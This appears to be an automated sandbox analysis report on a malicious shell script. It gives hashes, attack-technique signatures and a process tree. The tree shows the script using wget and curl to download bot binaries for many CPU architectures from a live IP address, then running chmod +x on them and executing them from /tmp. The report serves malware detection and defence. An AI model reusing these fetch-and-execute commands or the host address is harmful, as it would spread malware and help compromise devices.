Analysis
-
max time kernel
69s -
max time network
72s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/11/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 855 chmod 861 chmod 735 chmod 751 chmod 829 chmod 849 chmod 729 chmod 795 chmod 808 chmod 843 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 730 3AvA /tmp/3AvA 736 3AvA /tmp/3AvA 753 3AvA /tmp/3AvA 796 3AvA /tmp/3AvA 809 3AvA /tmp/3AvA 830 3AvA /tmp/3AvA 844 3AvA /tmp/3AvA 850 3AvA /tmp/3AvA 856 3AvA /tmp/3AvA 862 3AvA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 732 wget 733 curl 734 cat 736 3AvA -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
-
/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh1⤵
- Writes file to tmp directory
PID:699 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵PID:702
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Reads runtime system information
PID:713
-
-
/bin/catcat UnHAnaAW.x862⤵PID:728
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:730
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:733
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵PID:738
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
PID:743
-
-
/bin/catcat UnHAnaAW.mpsl2⤵PID:750
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:753
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:755
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵
- Reads runtime system information
PID:790
-
-
/bin/catcat UnHAnaAW.arm42⤵PID:794
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:796
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵PID:798
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Reads runtime system information
PID:799
-
-
/bin/catcat UnHAnaAW.arm52⤵PID:806
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:809
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:812
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Reads runtime system information
PID:815
-
-
/bin/catcat UnHAnaAW.arm62⤵PID:827
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm72⤵PID:832
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm72⤵
- Reads runtime system information
PID:841
-
-
/bin/catcat UnHAnaAW.arm72⤵PID:842
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.ppc2⤵PID:846
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.ppc2⤵
- Reads runtime system information
PID:847
-
-
/bin/catcat UnHAnaAW.ppc2⤵PID:848
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.m68k2⤵PID:852
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.m68k2⤵
- Reads runtime system information
PID:853
-
-
/bin/catcat UnHAnaAW.m68k2⤵PID:854
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.sh42⤵PID:858
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.sh42⤵
- Reads runtime system information
PID:859
-
-
/bin/catcat UnHAnaAW.sh42⤵PID:860
-
-
/bin/chmodchmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:862
-